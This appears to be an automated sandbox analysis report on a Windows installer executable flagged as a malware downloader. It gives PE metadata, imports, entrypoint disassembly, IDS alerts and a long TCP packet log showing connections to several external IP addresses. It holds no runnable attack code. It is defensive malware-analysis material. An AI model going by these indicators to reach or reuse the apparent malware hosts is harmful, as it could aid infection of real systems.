Entrypoint:	0x40352f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660843EA [Sat Mar 30 16:55:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F74048D67FAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F74048D67C8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [007A8318h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d7000	0x291e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x66d1	0x6800	1cb1571d2754df0a2b7df66b1b8d9089	False	0.6727388822115384	data	6.4708065613184305	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e378	0x600	92e7d2d711bd61815cb4cc2d30d795b1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x2e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d7000	0x291e8	0x29200	cc706edee509d9ecaeb9366e623c5894	False	0.0645243636018237	data	2.7972076937156523	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3d73b8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.021042825032532828
RT_ICON	0x3e7be0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.037576203489594284
RT_ICON	0x3f1088	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.05318853974121996
RT_ICON	0x3f6510	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.04127302786962683
RT_ICON	0x3fa738	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08018672199170125
RT_ICON	0x3fcce0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09709193245778612
RT_ICON	0x3fdd88	0xd29	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9076877411694865
RT_ICON	0x3feab8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.18442622950819673
RT_ICON	0x3ff440	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.225177304964539
RT_DIALOG	0x3ff8a8	0xb8	data	English	United States	0.6467391304347826
RT_DIALOG	0x3ff960	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x3ffaa8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3ffba8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3ffcc8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3ffd28	0x84	data	English	United States	0.7348484848484849
RT_VERSION	0x3ffdb0	0x1a8	data	English	United States	0.5660377358490566
RT_MANIFEST	0x3fff58	0x290	XML 1.0 document, ASCII text, with very long lines (656), with no line terminators	English	United States	0.5625

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-27T18:04:57.946926+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49796	80	192.168.11.20	193.122.6.168
2024-08-27T18:04:58.376289+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49803	443	192.168.11.20	104.21.67.152
2024-08-27T18:04:57.035724+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49801	443	192.168.11.20	104.21.67.152
2024-08-27T18:04:52.901049+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49796	80	192.168.11.20	193.122.6.168
2024-08-27T18:04:59.067006+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49804	443	192.168.11.20	104.21.67.152
2024-08-27T18:04:57.711172+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49802	443	192.168.11.20	104.21.67.152
2024-08-27T18:04:55.009751+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49798	443	192.168.11.20	104.21.67.152
2024-08-27T18:04:56.340136+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49800	443	192.168.11.20	104.21.67.152
2024-08-27T18:04:55.916109+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49796	80	192.168.11.20	193.122.6.168
2024-08-27T18:04:54.572636+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49796	80	192.168.11.20	193.122.6.168
2024-08-27T18:04:58.618537+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49796	80	192.168.11.20	193.122.6.168
2024-08-27T18:04:59.305896+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49796	80	192.168.11.20	193.122.6.168
2024-08-27T18:04:55.672397+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49799	443	192.168.11.20	104.21.67.152
2024-08-27T18:04:55.244292+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49796	80	192.168.11.20	193.122.6.168
2024-08-27T18:04:59.749930+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49805	443	192.168.11.20	104.21.67.152
2024-08-27T18:04:50.784846+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49795	80	192.168.11.20	104.153.208.178
2024-08-27T18:04:56.587786+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49796	80	192.168.11.20	193.122.6.168
2024-08-27T18:04:57.275179+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49796	80	192.168.11.20	193.122.6.168

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 27, 2024 18:04:50.457346916 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.619808912 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.620136976 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.620862961 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.783212900 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.784583092 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.784658909 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.784719944 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.784776926 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.784832954 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.784846067 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.784846067 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.784888983 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.784945011 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.784998894 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.785053968 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.785083055 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.785106897 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.785134077 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.785134077 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.785192013 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.785247087 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.785285950 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.947619915 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.947726011 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.947820902 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.947911024 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.947972059 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.947972059 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.947973013 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948014021 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948095083 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948147058 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948170900 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948198080 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948327065 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948328018 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948378086 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948411942 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948507071 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948568106 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948571920 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948623896 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948626041 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948681116 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948734999 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948738098 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948739052 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948790073 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948796034 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948846102 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948899984 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948903084 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948903084 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.948954105 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.948960066 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.949007988 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.949063063 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:50.949064970 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.949064970 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.949122906 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.949229002 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:50.949229002 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.111469030 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.111587048 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.111685991 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.111746073 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.111783981 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.111813068 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.111871004 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.111886024 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.111974001 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.111993074 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112092018 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112108946 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112185955 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112262011 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112317085 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112364054 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112416029 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112430096 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112484932 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112507105 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112539053 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112560034 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112592936 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112638950 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112647057 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112700939 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112740993 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112756014 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112809896 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112863064 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112888098 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112889051 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112889051 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.112916946 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.112971067 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113004923 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113004923 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113025904 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113080025 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113106012 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113106012 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113133907 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113188028 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113199949 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113241911 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113250971 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113296986 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113301039 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113347054 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113351107 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113404036 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113404989 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113451958 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113459110 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113508940 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113513947 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113557100 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113568068 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113611937 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113622904 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113661051 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113677025 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113717079 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113732100 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113780975 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113786936 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113828897 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113841057 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113898039 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113945961 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.113949060 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113954067 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.113995075 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.114118099 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.114130974 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.114145041 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.114250898 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.114250898 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.276526928 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.276643991 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.276720047 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.276803970 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.276864052 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.276864052 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.276894093 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.276932001 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.276967049 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.277070999 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.277172089 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.277194977 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.277287960 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.277357101 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.277429104 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.277442932 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.277479887 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.277507067 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.277563095 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.277666092 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.277666092 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.277724981 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.277813911 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.277827024 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.277900934 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.277961016 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.277971983 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.278009892 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.278048992 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.278105974 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.278172016 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.278219938 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.278275967 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.278372049 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.278456926 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.278536081 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.278572083 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.278605938 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.278640985 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.278685093 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.278747082 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.278747082 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.278795004 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.278901100 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.278901100 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.279761076 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.279863119 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.279943943 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.279994965 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280003071 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280047894 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280057907 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280108929 CEST	49795	80	192.168.11.20	104.153.208.178
